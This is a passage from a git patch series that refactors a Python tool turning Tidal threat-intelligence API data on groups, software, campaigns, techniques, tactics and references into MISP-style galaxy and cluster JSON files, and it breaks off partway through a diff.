"group_id", - "type": "used-by" - }, - "associated_software": { - "mode": "private", - "dest-uuid": "id", - "type": "related-to" - } - }, - "uuid": "id", - "value": "name" - }, - "groups": { - "description": "description", - "meta": { - "source": "source", - "group-attack-id": "group_attack_id", - "country": { - "extract": "single", - "key": "country", - "subkey": "country_code" - }, - "observed_country": { - "extract": "multiple", - "key": "observed_country", - "subkey": "country_code" - }, - "observed_motivation": { - "extract": "multiple", - "key": "observed_motivation", - "subkey": "name" - }, - "target-category": { - "extract": "multiple", - "key": "observed_sector", - "subkey": "name" - }, - "tags": "tags", - "owner": "owner_name" - }, - "related": { - "associated_groups": { - "mode": "private", - "dest-uuid": "id", - "type": "related-to" - } - }, - "uuid": "id", - "value": "name" - }, - "campaigns": { - "description": "description", - "meta": { - "source": "source", - "campaign-attack-id": "campaign_attack_id", - "first_seen": "first_seen", - "last_seen": "last_seen", - "tags": "tags", - "owner": "owner_name" - }, - "related": {}, - "uuid": "id", - "value": "name" - }, - "technique": { - "description": "description", - "meta": { - "source": "source", - "platforms": { - "extract": "multiple", - "key": "platforms", - "subkey": "name" - }, - "tags": { - "extract": "multiple", - "key": "tags", - "subkey": "tag" - }, - "owner": "owner_name" - }, - "related": { - "tactic": { - "mode": "public", - "dest-uuid": "tactic_id", - "type": "uses" - }, - "sub_technique": { - "mode": "private", - "dest-uuid": "id", - "type": "sub-technique-of" - } - }, - "uuid": "id", - "value": "name" - }, - "tactic": { - "description": "description", - "meta": { - "source": "source", - "tactic-attack-id": "tactic_attack_id", - "ordinal_position": "ordinal_position", - "tags": "tags", - "owner": "owner_name" - }, - "related": { - "techniques": { - "mode": "public", - "dest-uuid": "technique_id", - "type": "uses" - } - }, - "uuid": "id", - "value": "name" - }, - "references": { - "description": "description", - "meta": { - "source": "source", - "refs": { - "extract": "reverse", - "key": "url" - }, - "owner": "owner_name", - "title": "title", - "author": "authors", - "date_accessed": "date_accessed", - "date_published": "date_published" - }, - "related": {}, - "uuid": "id", - "value": "name" - } - } -} \ No newline at end of file diff --git a/tools/tidal-api/config/campaigns.json b/tools/tidal-api/config/campaigns.json new file mode 100644 index 0000000..8463932 --- /dev/null +++ b/tools/tidal-api/config/campaigns.json @@ -0,0 +1,17 @@ +{ + "galaxy": { + "name": "Tidal Campaigns", + "namespace": "tidal", + "description": "Tidal Campaigns Galaxy", + "type": "campaigns", + "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48" + }, + "cluster": { + "authors": "Tidal", + "category": "Campaigns", + "description": "Tidal Campaigns Cluster", + "name": "Tidal Campaigns", + "source": "Tidal", + "type": "campaigns" + } +} \ No newline at end of file diff --git a/tools/tidal-api/config/groups.json b/tools/tidal-api/config/groups.json new file mode 100644 index 0000000..152b33c --- /dev/null +++ b/tools/tidal-api/config/groups.json @@ -0,0 +1,17 @@ +{ + "galaxy": { + "name": "Tidal Groups", + "namespace": "tidal", + "description": "Tidal Groups Galaxy", + "type": "groups", + "uuid": "41c3e5c0-de5c-4edb-b48b-48cd8e7519e6" + }, + "cluster": { + "authors": "Tidal", + "category": "Threat Groups", + "description": "Tidal Threat Groups Cluster", + "name": "Tidal Threat Groups", + "source": "Tidal", + "type": "groups" + } +} \ No newline at end of file diff --git a/tools/tidal-api/config/references.json b/tools/tidal-api/config/references.json new file mode 100644 index 0000000..697861e --- /dev/null +++ b/tools/tidal-api/config/references.json @@ -0,0 +1,17 @@ +{ + "galaxy": { + "name": "Tidal References", + "namespace": "tidal", + "description": "Tidal References Galaxy", + "type": "references", + "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48" + }, + "cluster": { + "authors": "Tidal", + "category": "References", + "description": "Tidal References Cluster", + "name": "Tidal References", + "source": "Tidal", + "type": "references" + } +} \ No newline at end of file diff --git a/tools/tidal-api/config/software.json b/tools/tidal-api/config/software.json new file mode 100644 index 0000000..58bd485 --- /dev/null +++ b/tools/tidal-api/config/software.json @@ -0,0 +1,17 @@ +{ + "galaxy": { + "name": "Tidal Software", + "namespace": "tidal", + "description": "Tidal Software Galaxy", + "type": "software", + "uuid": "38d62d8b-4c49-489a-9bc4-8e294c4f04f7" + }, + "cluster": { + "authors": "Tidal", + "category": "Software", + "description": "Tidal Software Cluster", + "name": "Tidal Software", + "source": "Tidal", + "type": "software" + } +} \ No newline at end of file diff --git a/tools/tidal-api/config/tactic.json b/tools/tidal-api/config/tactic.json new file mode 100644 index 0000000..31d592c --- /dev/null +++ b/tools/tidal-api/config/tactic.json @@ -0,0 +1,17 @@ +{ + "galaxy": { + "name": "Tidal Tactic", + "namespace": "tidal", + "description": "Tidal Tactic Galaxy", + "type": "tactic", + "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48" + }, + "cluster": { + "authors": "Tidal", + "category": "Tactic", + "description": "Tidal Tactic Cluster", + "name": "Tidal Tactic", + "source": "Tidal", + "type": "tactic" + } +} \ No newline at end of file diff --git a/tools/tidal-api/config/technique.json b/tools/tidal-api/config/technique.json new file mode 100644 index 0000000..4f72c96 --- /dev/null +++ b/tools/tidal-api/config/technique.json @@ -0,0 +1,17 @@ +{ + "galaxy": { + "name": "Tidal Technique", + "namespace": "tidal", + "description": "Tidal Technique Galaxy", + "type": "technique", + "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48" + }, + "cluster": { + "authors": "Tidal", + "category": "Technique", + "description": "Tidal Technique Cluster", + "name": "Tidal Technique", + "source": "Tidal", + "type": "technique" + } +} \ No newline at end of file diff --git a/tools/tidal-api/main.py b/tools/tidal-api/main.py index f2e248f..d402dbb 100644 --- a/tools/tidal-api/main.py +++ b/tools/tidal-api/main.py @@ -1,134 +1,89 @@ from api.api import TidalAPI from models.galaxy import Galaxy -from models.cluster import Cluster -from utils.extractor import extract_links -from utils.config import load_config +from models.cluster import GroupCluster, SoftwareCluster, CampaignsCluster, TechniqueCluster, TacticCluster, ReferencesCluster import argparse +import json +import os -CLUSTER_PATH = "../../clusters/" -GALAXY_PATH = "../../galaxies/" +CONFIG = "./config" +GALAXY_PATH = "../../galaxies" +CLUSTER_PATH = "../../clusters" -config = load_config("./config.json") - -UUIDS = config["UUIDS"] -GALAXY_CONFIGS = config["GALAXY_CONFIGS"] -CLUSTER_CONFIGS = config["CLUSTER_CONFIGS"] -VALUE_FIELDS = config["VALUE_FIELDS"] - - -def create_cluster_values(data, cluster, add_private): - value_fields = VALUE_FIELDS[cluster.internal_type] - for entry in data["data"]: - values = {} - for key, value in value_fields.items(): - match key: - case "description": - values[value] = entry.get(key) - case "meta": - metadata = create_metadata(entry, value) - values["meta"] = metadata - case "related": - relations = create_relations(entry, value, add_private) - values["related"] = relations - case "uuid": - values[key] = entry.get(value) - case "value": - values[key] = entry.get(value) - case _: - print( - f"Error: Invalid configuration for {key} in {cluster.internal_type} value fields." - ) - cluster.add_value(values) - - -def create_metadata(data, format): - metadata = {} - for meta_key, meta_value in format.items(): - if isinstance(meta_value, dict): - if meta_value.get("extract") == "single" and data.get(meta_value["key"]): - metadata[meta_key] = data.get(meta_value["key"])[0].get( - meta_value["subkey"] - ) - elif meta_value.get("extract") == "multiple" and data.get( - meta_value["key"] - ): - metadata[meta_key] = [ - entry.get(meta_value["subkey"]) - for entry in data.get(meta_value["key"]) - ] - elif meta_value.get("extract") == "reverse" and data.get(meta_value["key"]): - metadata[meta_key] = [data.get(meta_value["key"])] - elif data.get(meta_value): - metadata[meta_key] = data.get(meta_value) - return metadata - - -def create_relations(data, format, add_private): - relations = [] - for i in range(len(list(format))): - for relation in data[list(format)[i]]: - if not add_private and list(format.values())[i].get("mode") == "private": - continue - relation_entry = {} - for relation_key, relation_value in list(format.values())[i].items(): - if relation_key != "type": - if relation_key == "mode": - continue - relation_entry[relation_key] = relation.get(relation_value) - else: - relation_entry[relation_key] = relation_value - relations.append(relation_entry) - return relations - - -def create_galaxy_and_cluster(galaxy_type, version, add_private=False): +def create_galaxy(endpoint: str, version: int): api = TidalAPI() - galaxy = Galaxy(**GALAXY_CONFIGS[galaxy_type], version=version) - galaxy.save_to_file(f"{GALAXY_PATH}/tidal-{galaxy_type}.json") + data = api.get_data(endpoint) + with open(f"{CONFIG}/{endpoint}.json", "r") as file: + config = json.load(file) - cluster = Cluster(**CLUSTER_CONFIGS[galaxy_type], internal_type=galaxy_type) - data = api.get_data(galaxy_type) - create_cluster_values(data, cluster, add_private) - cluster.save_to_file(f"{CLUSTER_PATH}/tidal-{galaxy_type}.json") + galaxy = Galaxy(**config["galaxy"], version=version) + galaxy.save_to_file(f"{GALAXY_PATH}/tidal-{endpoint}.json") + + match endpoint: + case "groups": + cluster = GroupCluster(**config["cluster"], uuid=galaxy.uuid) + cluster.add_values(data) + case "software": + cluster = SoftwareCluster(**config["cluster"], uuid=galaxy.uuid) + cluster.add_values(data) + case "campaigns": + cluster = CampaignsCluster(**config["cluster"], uuid=galaxy.uuid) + cluster.add_values(data) + case "technique": + cluster = TechniqueCluster(**config["cluster"], uuid=galaxy.uuid) + cluster.add_values(data) + case "tactic": + cluster = TacticCluster(**config["cluster"], uuid=galaxy.uuid) + cluster.add_values(data) + case "references": + cluster = ReferencesCluster(**config["cluster"], uuid=galaxy.uuid) + cluster.add_values(data) + case _: + print("Error: Invalid endpoint") + return - print(f"Galaxy tidal-{galaxy_type} created") + cluster.save_to_file(f"{CLUSTER_PATH}/tidal-{endpoint}.json") + print(f"Galaxy tidal-{endpoint} created") - -def create_galaxy(args): +def main(args, galaxies): if args.all: - for galaxy_type in GALAXY_CONFIGS: - create_galaxy_and_cluster(galaxy_type, args.version, args.addprivate) + for galaxy in galaxies: + create_galaxy(galaxy, args.version) else: - create_galaxy_and_cluster(args.type, args.version, args.addprivate) - + create_galaxy(args.type, args.version) + if __name__ == "__main__": - parser = argparse.ArgumentParser( - description="Create a galaxy and cluster for Tidal API" - ) - subparsers = parser.add_subparsers(dest="command") - galaxy_parser = subparsers.add_parser( - "create_galaxy", help="Create a galaxy from the Tidal API" + galaxies = [] + for f in os.listdir(CONFIG): + if f.endswith(".json"): + galaxies.append(f.split(".")[0]) + + + parser = argparse.ArgumentParser( + description="Create galaxy and cluster json files from Tidal API" ) - galaxy_parser.add_argument( + parser.add_argument( + "--all", + action="store_true", + help="Create all galaxies and clusters", + ) + parser.add_argument( "--type", - choices=list(GALAXY_CONFIGS.keys()) + ["all"], - help="The type of the galaxy", + choices=galaxies, + help="The type of the file to create", ) - galaxy_parser.add_argument( - "-v", "--version", type=int, required=True, help="The version of the galaxy" + parser.add_argument( + "-v", + "--version", + type=int, + required=True, + help="The version of the galaxy", ) - galaxy_parser.add_argument( - "--all", action="store_true", help="Flag to create all predefined galaxy types" - ) - galaxy_parser.add_argument( - "--addprivate", action="store_true", help="Flag to add private relations" - ) - galaxy_parser.set_defaults(func=create_galaxy) + parser.set_defaults(func=main) args = parser.parse_args() if hasattr(args, "func"): - args.func(args) + args.func(args, galaxies=galaxies) else: - parser.print_help() + parser.print_help() \ No newline at end of file diff --git a/tools/tidal-api/models/cluster.py b/tools/tidal-api/models/cluster.py index 2436b89..4c75a98 100644 --- a/tools/tidal-api/models/cluster.py +++ b/tools/tidal-api/models/cluster.py @@ -1,7 +1,79 @@ +from dataclasses import dataclass, field, asdict import json +@dataclass +class Meta: + pass + +@dataclass +class GroupsMeta(): + source: str = None + group_attack_id: str = None + country: str = None + observed_countries: list = None + observed_motivations: list = None + target_categories: list = None + tags: list = None + owner: str = None + +@dataclass +class SoftwareMeta(): + source: str = None + type: str = None + software_attack_id: str = None + platforms: list = None + tags: list = None + owner: str = None + +@dataclass +class TechniqueMeta(): + source: str = None + platforms: list = None + tags: list = None + owner: str = None + +@dataclass +class TacticMeta(): + source: str = None + tactic_attack_id: str = None + ordinal_position: int = None + tags: list = None + owner: str = None + +@dataclass +class ReferencesMeta(): + source: str = None + refs: list = None + title: str = None + author: str = None + date_accessed: str = None + date_published: str = None + owner: str = None + +@dataclass +class CampaignsMeta(): + source: str = None + campaign_attack_id: str = None + first_seen: str = None + last_seen: str = None + tags: list = None + owner: str = None + +@dataclass +class ClusterValue: + description: str = "" + meta: Meta = field(default_factory=Meta) + related: list = field(default_factory=list) + uuid: str = "" + value: str = "" + + def return_value(self): + value_dict = asdict(self) + value_dict['meta'] = {k: v for k, v in asdict(self.meta).items() if v is not None} + return value_dict + class Cluster(): - def __init__(self, authors: str, category: str, description: str, name: str, source: str, type: str, uuid: str, values: list, internal_type: str): + def __init__(self, authors: str, category: str, description: str, name: str, source: str, type: str, uuid: str): self.authors = authors self.category = category self.description = description @@ -9,15 +81,200 @@ class Cluster(): self.source = source self.type = type self.uuid = uuid - self.values = values - self.internal_type = internal_type + self.values = [] - def add_value(self, value): - self.values.append(value) + def add_values(self): + print("This method should be implemented in the child class") def save_to_file(self, path): with open(path, "w") as file: - file.write(json.dumps(self.__dict__, indent=4)) + file.write(json.dumps(self.__dict__(), indent=4)) - def get_config(self): - return self.__dict__ + def __str__(self) -> str: + return f"Cluster: {self.name} - {self.type} - {self.uuid}" + + def __dict__(self) -> dict: + return { + "authors": self.authors, + "category": self.category, + "description": self.description, + "name": self.name, + "source": self.source, + "type": self.type, + "uuid": self.uuid, + "values": self.values, + } + +class GroupCluster(Cluster): + def __init__(self, authors: str, category: str, description: str, name: str, source: str, type: str, uuid: str): + super().__init__(authors, category, description, name, source, type, uuid) + + def add_values(self, data): + for entry in data["data"]: + meta = GroupsMeta( + source=entry.get("source"), + group_attack_id=entry.get("group_attack_id"), + country=entry.get("country")[0].get("country_code") if entry.get("country") else None, + observed_countries=[x.get("country_code") for x in entry.get("observed_country")], + observed_motivations=[x.get("name") for x in entry.get("observed_motivation")], + target_categories=[x.get("name") for x in entry.get("observed_sector")], + tags=[x.get("tag") for x in entry.get("tags")], + owner=entry.get("owner_name"), + ) + related = [] + for relation in entry.get("associated_groups"): + related.append({ + "dest-uuid": relation.get("id"), + "type": "related-to", + } + ) + value = ClusterValue( + description=entry.get("description"), + meta=meta, + related=related, + uuid=entry.get("id"), + value=entry.get("name"), + ) + self.values.append(value.return_value()) + + +class SoftwareCluster(Cluster): + def __init__(self, authors: str, category: str, description: str, name: str, source: str, type: str, uuid: str): + super().__init__(authors, category, description, name, source, type, uuid) + + def add_values(self, data): + for entry in data["data"]: + meta = SoftwareMeta( + source=entry.get("source"), + type=entry.get("type"), + software_attack_id=entry.get("software_attack_id"), + platforms=[x.get("name") for x in entry.get("platforms")], + tags=[x.get("tag") for x in entry.get("tags")], + owner=entry.get("owner_name"), + ) + related = [] + for relation in entry.get("groups"): + related.append({ + "dest-uuid": relation.get("group_id"), + "type": "used-by", + } + ) + for relation in entry.get("associated_software"): + related.append({ + "dest-uuid": relation.get("id"), + "type": "related-to", + } + ) + value = ClusterValue( + description=entry.get("description"), + meta=meta, + related=related, + uuid=entry.get("id"), + value=entry.get("name"), + ) + self.values.append(value.return_value()) + +class TechniqueCluster(Cluster): + def __init__(self, authors: str, category: str, description: str, name: str, source: str, type: str, uuid: str): + super().__init__(authors, category, description, name, source, type, uuid) + + def add_values(self, data): + for entry in data["data"]: + meta = TechniqueMeta( + source=entry.get("source"), + platforms=[x.get("name") for x in entry.get("platforms")], + tags=[x.get("tag") for x in entry.get("tags")], + owner=entry.get("owner_name"), + ) + related = [] + for relation in entry.get("tactic"): + related.append({ + "dest-uuid": relation.get("tactic_id"), + "type": "uses", + } + ) + value = ClusterValue( + description=entry.get("description"), + meta=meta, + related=related, + uuid=entry.get("id"), + value=entry.get("name"), + ) + self.values.append(value.return_value()) + +class TacticCluster(Cluster): + def __init__(self, authors: str, category: str, description: str, name: str, source: str, type: str, uuid: str): + super().__init__(authors, category, description, name, source, type, uuid) + + def add_values(self, data): + for entry in data["data"]: + meta = TacticMeta( + source=entry.get("source"), + tactic_attack_id=entry.get("tactic_attack_id"), + ordinal_position=entry.get("ordinal_position"), + tags=[x.get("tag") for x in entry.get("tags")], + owner=entry.get("owner_name"), + ) + related = [] + for relation in entry.get("techniques"): + related.append({ + "dest-uuid": relation.get("technique_id"), + "type": "uses", + } + ) + value = ClusterValue( + description=entry.get("description"), + meta=meta, + related=related, + uuid=entry.get("id"), + value=entry.get("name"), + ) + self.values.append(value.return_value()) + +class ReferencesCluster(Cluster): + def __init__(self, authors: str, category: str, description: str, name: str, source: str, type: str, uuid: str): + super().__init__(authors, category, description, name, source, type, uuid) + + def add_values(self, data): + for entry in data["data"]: + meta = ReferencesMeta( + source=entry.get("source"), + refs=[entry.get("url")], + title=entry.get("title"), + author=entry.get("author"), + date_accessed=entry.get("date_accessed"), + date_published=entry.get("date_published"), + owner=entry.get("owner_name"), + ) + value = ClusterValue( + description=entry.get("description"), + meta=meta, + related=[], + uuid=entry.get("id"), + value=entry.get("name"), + ) + self.values.append(value.return_value()) + +class CampaignsCluster(Cluster): + def __init__(self, authors: str, category: str, description: str, name: str, source: str, type: str, uuid: str): + super().__init__(authors, category, description, name, source, type, uuid) + + def add_values(self, data): + for entry in data["data"]: + meta = CampaignsMeta( + source=entry.get("source"), + campaign_attack_id=entry.get("campaign_attack_id"), + first_seen=entry.get("first_seen"), + last_seen=entry.get("last_seen"), + tags=[x.get("tag") for x in entry.get("tags")], + owner=entry.get("owner_name"), + ) + related = [] + value = ClusterValue( + description=entry.get("description"), + meta=meta, + related=related, + uuid=entry.get("id"), + value=entry.get("name"), + ) + self.values.append(value.return_value()) \ No newline at end of file diff --git a/tools/tidal-api/models/galaxy.py b/tools/tidal-api/models/galaxy.py index 2de73b2..9b091e4 100644 --- a/tools/tidal-api/models/galaxy.py +++ b/tools/tidal-api/models/galaxy.py @@ -1,14 +1,15 @@ import json +from dataclasses import dataclass, asdict +@dataclass class Galaxy(): - def __init__(self, description, name, namespace, type, uuid, version): - self.description = description - self.name = name - self.namespace = namespace - self.type = type - self.uuid = uuid - self.version = version + description: str + name: str + namespace: str + type: str + uuid: str + version: str - def save_to_file(self, path): + def save_to_file(self, path: str): with open(path, "w") as file: - file.write(json.dumps(self.__dict__, indent=4)) + file.write(json.dumps(asdict(self), indent=4)) \ No newline at end of file diff --git a/tools/tidal-api/utils/__init__.py b/tools/tidal-api/utils/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/tools/tidal-api/utils/config.py b/tools/tidal-api/utils/config.py deleted file mode 100644 index d69e997..0000000 --- a/tools/tidal-api/utils/config.py +++ /dev/null @@ -1,14 +0,0 @@ -import json - -def load_config(file_path): - with open(file_path, 'r') as file: - config = json.load(file) - return link_uuids(config) - -def link_uuids(config): - uuids = config["UUIDS"] - for key, galaxy_config in config["GALAXY_CONFIGS"].items(): - galaxy_config["uuid"] = uuids[key] - for key, cluster_config in config["CLUSTER_CONFIGS"].items(): - cluster_config["uuid"] = uuids[key] - return config \ No newline at end of file diff --git a/tools/tidal-api/utils/extractor.py b/tools/tidal-api/utils/extractor.py deleted file mode 100644 index cfa534e..0000000 --- a/tools/tidal-api/utils/extractor.py +++ /dev/null @@ -1,6 +0,0 @@ -import re - -def extract_links(text): - links = re.findall(r'\[([^\]]+)\]\((https?://[^\s\)]+)\)', text) - urls = set([url for text, url in links]) - return urls \ No newline at end of file From a311ce6a1c8af74efb81f44d57ac8d63b78c9446 Mon Sep 17 00:00:00 2001 From: niclas Date: Fri, 23 Feb 2024 11:25:07 +0100 Subject: [PATCH 08/49] Add [technique] subtechnique --- tools/tidal-api/main.py | 18 ++- tools/tidal-api/models/cluster.py | 212 +++++++++++++++++++++++------- 2 files changed, 179 insertions(+), 51 deletions(-) diff --git a/tools/tidal-api/main.py b/tools/tidal-api/main.py index d402dbb..9438567 100644 --- a/tools/tidal-api/main.py +++ b/tools/tidal-api/main.py @@ -1,6 +1,13 @@ from api.api import TidalAPI from models.galaxy import Galaxy -from models.cluster import GroupCluster, SoftwareCluster, CampaignsCluster, TechniqueCluster, TacticCluster, ReferencesCluster +from models.cluster import ( + GroupCluster, + SoftwareCluster, + CampaignsCluster, + TechniqueCluster, + TacticCluster, + ReferencesCluster, +) import argparse import json import os @@ -9,6 +16,7 @@ CONFIG = "./config" GALAXY_PATH = "../../galaxies" CLUSTER_PATH = "../../clusters" + def create_galaxy(endpoint: str, version: int): api = TidalAPI() data = api.get_data(endpoint) @@ -17,7 +25,7 @@ def create_galaxy(endpoint: str, version: int): galaxy = Galaxy(**config["galaxy"], version=version) galaxy.save_to_file(f"{GALAXY_PATH}/tidal-{endpoint}.json") - + match endpoint: case "groups": cluster = GroupCluster(**config["cluster"], uuid=galaxy.uuid) @@ -44,13 +52,14 @@ def create_galaxy(endpoint: str, version: int): cluster.save_to_file(f"{CLUSTER_PATH}/tidal-{endpoint}.json") print(f"Galaxy tidal-{endpoint} created") + def main(args, galaxies): if args.all: for galaxy in galaxies: create_galaxy(galaxy, args.version) else: create_galaxy(args.type, args.version) - + if __name__ == "__main__": @@ -59,7 +68,6 @@ if __name__ == "__main__": if f.endswith(".json"): galaxies.append(f.split(".")[0]) - parser = argparse.ArgumentParser( description="Create galaxy and cluster json files from Tidal API" ) @@ -86,4 +94,4 @@ if __name__ == "__main__": if hasattr(args, "func"): args.func(args, galaxies=galaxies) else: - parser.print_help() \ No newline at end of file + parser.print_help() diff --git a/tools/tidal-api/models/cluster.py b/tools/tidal-api/models/cluster.py index 4c75a98..fca9171 100644 --- a/tools/tidal-api/models/cluster.py +++ b/tools/tidal-api/models/cluster.py @@ -1,12 +1,14 @@ from dataclasses import dataclass, field, asdict import json + @dataclass class Meta: pass + @dataclass -class GroupsMeta(): +class GroupsMeta(Meta): source: str = None group_attack_id: str = None country: str = None @@ -16,8 +18,9 @@ class GroupsMeta(): tags: list = None owner: str = None + @dataclass -class SoftwareMeta(): +class SoftwareMeta(Meta): source: str = None type: str = None software_attack_id: str = None @@ -25,23 +28,32 @@ class SoftwareMeta(): tags: list = None owner: str = None + @dataclass -class TechniqueMeta(): +class TechniqueMeta(Meta): source: str = None platforms: list = None tags: list = None owner: str = None + @dataclass -class TacticMeta(): +class SubTechniqueMeta(Meta): + source: str = None + technique_attack_id: str = None + + +@dataclass +class TacticMeta(Meta): source: str = None tactic_attack_id: str = None ordinal_position: int = None tags: list = None owner: str = None + @dataclass -class ReferencesMeta(): +class ReferencesMeta(Meta): source: str = None refs: list = None title: str = None @@ -50,8 +62,9 @@ class ReferencesMeta(): date_published: str = None owner: str = None + @dataclass -class CampaignsMeta(): +class CampaignsMeta(Meta): source: str = None campaign_attack_id: str = None first_seen: str = None @@ -59,6 +72,7 @@ class CampaignsMeta(): tags: list = None owner: str = None + @dataclass class ClusterValue: description: str = "" @@ -69,11 +83,23 @@ class ClusterValue: def return_value(self): value_dict = asdict(self) - value_dict['meta'] = {k: v for k, v in asdict(self.meta).items() if v is not None} + value_dict["meta"] = { + k: v for k, v in asdict(self.meta).items() if v is not None + } return value_dict -class Cluster(): - def __init__(self, authors: str, category: str, description: str, name: str, source: str, type: str, uuid: str): + +class Cluster: + def __init__( + self, + authors: str, + category: str, + description: str, + name: str, + source: str, + type: str, + uuid: str, + ): self.authors = authors self.category = category self.description = description @@ -85,7 +111,7 @@ class Cluster(): def add_values(self): print("This method should be implemented in the child class") - + def save_to_file(self, path): with open(path, "w") as file: file.write(json.dumps(self.__dict__(), indent=4)) @@ -104,29 +130,48 @@ class Cluster(): "uuid": self.uuid, "values": self.values, } - + + class GroupCluster(Cluster): - def __init__(self, authors: str, category: str, description: str, name: str, source: str, type: str, uuid: str): + def __init__( + self, + authors: str, + category: str, + description: str, + name: str, + source: str, + type: str, + uuid: str, + ): super().__init__(authors, category, description, name, source, type, uuid) - + def add_values(self, data): for entry in data["data"]: meta = GroupsMeta( source=entry.get("source"), group_attack_id=entry.get("group_attack_id"), - country=entry.get("country")[0].get("country_code") if entry.get("country") else None, - observed_countries=[x.get("country_code") for x in entry.get("observed_country")], - observed_motivations=[x.get("name") for x in entry.get("observed_motivation")], + country=( + entry.get("country")[0].get("country_code") + if entry.get("country") + else None + ), + observed_countries=[ + x.get("country_code") for x in entry.get("observed_country") + ], + observed_motivations=[ + x.get("name") for x in entry.get("observed_motivation") + ], target_categories=[x.get("name") for x in entry.get("observed_sector")], tags=[x.get("tag") for x in entry.get("tags")], owner=entry.get("owner_name"), ) related = [] for relation in entry.get("associated_groups"): - related.append({ - "dest-uuid": relation.get("id"), - "type": "related-to", - } + related.append( + { + "dest-uuid": relation.get("id"), + "type": "related-to", + } ) value = ClusterValue( description=entry.get("description"), @@ -139,9 +184,18 @@ class GroupCluster(Cluster): class SoftwareCluster(Cluster): - def __init__(self, authors: str, category: str, description: str, name: str, source: str, type: str, uuid: str): + def __init__( + self, + authors: str, + category: str, + description: str, + name: str, + source: str, + type: str, + uuid: str, + ): super().__init__(authors, category, description, name, source, type, uuid) - + def add_values(self, data): for entry in data["data"]: meta = SoftwareMeta( @@ -154,16 +208,18 @@ class SoftwareCluster(Cluster): ) related = [] for relation in entry.get("groups"): - related.append({ - "dest-uuid": relation.get("group_id"), - "type": "used-by", - } + related.append( + { + "dest-uuid": relation.get("group_id"), + "type": "used-by", + } ) for relation in entry.get("associated_software"): - related.append({ - "dest-uuid": relation.get("id"), - "type": "related-to", - } + related.append( + { + "dest-uuid": relation.get("id"), + "type": "related-to", + } ) value = ClusterValue( description=entry.get("description"), @@ -174,10 +230,20 @@ class SoftwareCluster(Cluster): ) self.values.append(value.return_value()) + class TechniqueCluster(Cluster): - def __init__(self, authors: str, category: str, description: str, name: str, source: str, type: str, uuid: str): + def __init__( + self, + authors: str, + category: str, + description: str, + name: str, + source: str, + type: str, + uuid: str, + ): super().__init__(authors, category, description, name, source, type, uuid) - + def add_values(self, data): for entry in data["data"]: meta = TechniqueMeta( @@ -188,10 +254,11 @@ class TechniqueCluster(Cluster): ) related = [] for relation in entry.get("tactic"): - related.append({ - "dest-uuid": relation.get("tactic_id"), - "type": "uses", - } + related.append( + { + "dest-uuid": relation.get("tactic_id"), + "type": "uses", + } ) value = ClusterValue( description=entry.get("description"), @@ -202,10 +269,42 @@ class TechniqueCluster(Cluster): ) self.values.append(value.return_value()) + for sub_technique in entry.get("sub_technique"): + meta = SubTechniqueMeta( + source=sub_technique.get("source"), + technique_attack_id=sub_technique.get("technique_attack_id"), + ) + related = [] + for relation in sub_technique.get("tactic"): + related.append( + { + "dest-uuid": relation.get("tactic_id"), + "type": "uses", + } + ) + value = ClusterValue( + description=sub_technique.get("description"), + meta=meta, + related=related, + uuid=sub_technique.get("id"), + value=sub_technique.get("name"), + ) + self.values.append(value.return_value()) + + class TacticCluster(Cluster): - def __init__(self, authors: str, category: str, description: str, name: str, source: str, type: str, uuid: str): + def __init__( + self, + authors: str, + category: str, + description: str, + name: str, + source: str, + type: str, + uuid: str, + ): super().__init__(authors, category, description, name, source, type, uuid) - + def add_values(self, data): for entry in data["data"]: meta = TacticMeta( @@ -217,10 +316,11 @@ class TacticCluster(Cluster): ) related = [] for relation in entry.get("techniques"): - related.append({ - "dest-uuid": relation.get("technique_id"), - "type": "uses", - } + related.append( + { + "dest-uuid": relation.get("technique_id"), + "type": "uses", + } ) value = ClusterValue( description=entry.get("description"), @@ -231,10 +331,20 @@ class TacticCluster(Cluster): ) self.values.append(value.return_value()) + class ReferencesCluster(Cluster): - def __init__(self, authors: str, category: str, description: str, name: str, source: str, type: str, uuid: str): + def __init__( + self, + authors: str, + category: str, + description: str, + name: str, + source: str, + type: str, + uuid: str, + ): super().__init__(authors, category, description, name, source, type, uuid) - + def add_values(self, data): for entry in data["data"]: meta = ReferencesMeta( @@ -255,8 +365,18 @@ class ReferencesCluster(Cluster): ) self.values.append(value.return_value()) + class CampaignsCluster(Cluster): - def __init__(self, authors: str, category: str, description: str, name: str, source: str, type: str, uuid: str): + def __init__( + self, + authors: str, + category: str, + description: str, + name: str, + source: str, + type: str, + uuid: str, + ): super().__init__(authors, category, description, name, source, type, uuid) def add_values(self, data): @@ -277,4 +397,4 @@ class CampaignsCluster(Cluster): uuid=entry.get("id"), value=entry.get("name"), ) - self.values.append(value.return_value()) \ No newline at end of file + self.values.append(value.return_value()) From 5062c6162099efa296a81690d17849ed398b3353 Mon Sep 17 00:00:00 2001 From: niclas Date: Fri, 23 Feb 2024 14:54:25 +0100 Subject: [PATCH 09/49] Add [tidal] relation enrichment with mitre --- tools/tidal-api/main.py | 16 ++- tools/tidal-api/models/cluster.py | 168 ++++++++++++++++++++++++------ 2 files changed, 149 insertions(+), 35 deletions(-) diff --git a/tools/tidal-api/main.py b/tools/tidal-api/main.py index 9438567..559a4f5 100644 --- a/tools/tidal-api/main.py +++ b/tools/tidal-api/main.py @@ -17,7 +17,7 @@ GALAXY_PATH = "../../galaxies" CLUSTER_PATH = "../../clusters" -def create_galaxy(endpoint: str, version: int): +def create_galaxy(endpoint: str, version: int, extended_relations: bool = False): api = TidalAPI() data = api.get_data(endpoint) with open(f"{CONFIG}/{endpoint}.json", "r") as file: @@ -28,10 +28,10 @@ def create_galaxy(endpoint: str, version: int): match endpoint: case "groups": - cluster = GroupCluster(**config["cluster"], uuid=galaxy.uuid) + cluster = GroupCluster(**config["cluster"], uuid=galaxy.uuid, enrichment=extended_relations) cluster.add_values(data) case "software": - cluster = SoftwareCluster(**config["cluster"], uuid=galaxy.uuid) + cluster = SoftwareCluster(**config["cluster"], uuid=galaxy.uuid, enrichment=extended_relations) cluster.add_values(data) case "campaigns": cluster = CampaignsCluster(**config["cluster"], uuid=galaxy.uuid) @@ -56,9 +56,9 @@ def create_galaxy(endpoint: str, version: int): def main(args, galaxies): if args.all: for galaxy in galaxies: - create_galaxy(galaxy, args.version) + create_galaxy(galaxy, args.version, args.extended_relations) else: - create_galaxy(args.type, args.version) + create_galaxy(args.type, args.version, args.extended_relations) if __name__ == "__main__": @@ -72,6 +72,7 @@ if __name__ == 